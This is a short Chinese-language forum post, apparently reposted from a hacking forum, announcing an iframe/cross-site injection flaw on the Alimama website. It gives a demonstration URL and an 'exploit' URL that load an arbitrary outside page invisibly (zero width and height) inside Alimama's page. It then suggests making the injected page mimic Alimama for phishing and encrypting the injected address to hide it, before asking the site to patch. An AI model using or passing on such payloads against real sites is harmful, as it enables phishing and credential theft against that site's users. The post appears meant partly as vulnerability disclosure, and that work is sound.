阿里妈妈惊现跨站漏洞！！！ 阿里, 妈妈, 漏洞

zj35155

演示代码：
http://www.alimama.com/membersvc/adzone/zoneDefaultADiFrame.htm?iframeWith=468&iframeHeight=60&iframeUrl=http://www.cnsafe8.com
利用代码：
http://www.alimama.com/membersvc/adzone/zoneDefaultADiFrame.htm?iframeWith=0&iframeHeight=0&iframeUrl=网站
就这样神不知鬼不觉的把你的网页放到啊里妈妈的网页中了。
当别人打开后是一个空白页面
如果把你跨的网页做的和啊里妈妈一模一样还能做个掉鱼页面出来，危害极其大！！
再把后面网站加下密就更完美了。
望阿里妈妈网及时修补！
文章出处：http://www.cnsafe8.com

本篇文章来源于 黑客手册技术论坛
原文链接：http://www.nohack.cn/bbs/thread-68623-1-1.html